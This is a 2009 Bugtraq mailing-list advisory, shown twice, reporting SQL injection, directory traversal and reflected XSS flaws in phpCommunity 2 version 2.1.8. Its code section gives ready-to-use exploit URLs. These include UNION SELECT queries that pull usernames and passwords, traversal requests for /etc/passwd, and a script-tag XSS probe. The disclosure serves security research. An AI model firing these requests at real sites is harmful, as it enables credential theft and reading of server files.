phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS)

To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
Subject: phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS)
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
Date: Sat, 7 Mar 2009 18:25:19 +0100
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=XZlrwwQ5veJ6oby50VKkdl+bLBsj6b4wN19eHWfvsPM=; b=Lcoop5RTkWFV/FoIkIiRFtiZ7rNVcVeky0YNgvQG4kXyPZBpeAwXlxFr3DyPtXvdHs Q/9rKZO56qt6n26e5qT18fLrNYTwqSEBO8R/JItEGEIlF+3WD06kKTI+JhPBYd2y+94l i5GjIzNweev/9OZPROGJpoIk2dkhu6LEZeBW4=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=cNbmVzmxbQy5NqfT6gvBGgvbDcEQMpti8KusN29hh0XHKBFoJIiU+alSMbmAABSMrT UuNBROiGky52LmT089XZtI5unxSc1HbTT9+Mseqw2AGEn1HTS/pCALfd6R3J0fK4vySU Dbsm4AOstzAA3IUkG+N/tWh5RcokCz6fjQnr4=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

*******   Salvatore "drosophila" Fresta   *******

[+] Application: phpCommunity 2
[+] Version: 2.1.8
[+] Website: http://sourceforge.net/projects/phpcommunity2/

[+] Bugs: [A] Multiple SQL Injection
          [B] Directory Traversal
          [C] Reflected XSS

[+] Exploitation: Remote
[+] Date: 07 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities
discovered in this application.


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: module/forum/class_forum.php
                   module/forum/class_search.php

This bug allows a guest to view username and
password of a registered user.


- [B] Directory Traversal

[-] Requisites: none
[-] File affected: module/admin/files/show_file.php,
                   module/admin/files/show_source.php

This bug allows a guest to read arbitrary files and
directory on the web server.


- [C] Reflected XSS

[-] Requisites: none
[-] File affected: templates/1/login.php


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1'
UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM
com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1'
UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM
com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25";
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25";
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25";
UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23


- [B] Directory Traversal

http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd

http://www.site.com/path/module/admin/files/show_source.php?path=/etc


- [C] Reflected XSS

http://www.site.com/path/templates/1/login.php?msg=<script>alert('XSS');</script>


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

*******   Salvatore "drosophila" Fresta   *******

[+] Application: phpCommunity 2
[+] Version: 2.1.8
[+] Website: http://sourceforge.net/projects/phpcommunity2/

[+] Bugs: [A] Multiple SQL Injection
          [B] Directory Traversal
          [C] Reflected XSS

[+] Exploitation: Remote
[+] Date: 07 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities 
discovered in this application.


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: module/forum/class_forum.php
                   module/forum/class_search.php

This bug allows a guest to view username and
password of a registered user.


- [B] Directory Traversal

[-] Requisites: none
[-] File affected: module/admin/files/show_file.php,
                   module/admin/files/show_source.php

This bug allows a guest to read arbitrary files and 
directory on the web server.


- [C] Reflected XSS

[-] Requisites: none
[-] File affected: templates/1/login.php


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' UNION 
ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1'
 UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25"; UNION 
ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25"; 
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25"; 
UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23


- [B] Directory Traversal

http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd

http://www.site.com/path/module/admin/files/show_source.php?path=/etc


- [C] Reflected XSS

http://www.site.com/path/templates/1/login.php?msg=<script>alert('XSS');</script>


*************************************************

[+] Fix

No fix.


*************************************************

Prev by Date: [ GLSA 200903-09 ] OpenTTD: Execution of arbitrary code
Next by Date: [ GLSA 200903-10 ] Irrlicht: User-assisted execution of arbitrary code
Previous by thread: [ GLSA 200903-09 ] OpenTTD: Execution of arbitrary code
Next by thread: [ GLSA 200903-10 ] Irrlicht: User-assisted execution of arbitrary code
Index(es):
- Date
- Thread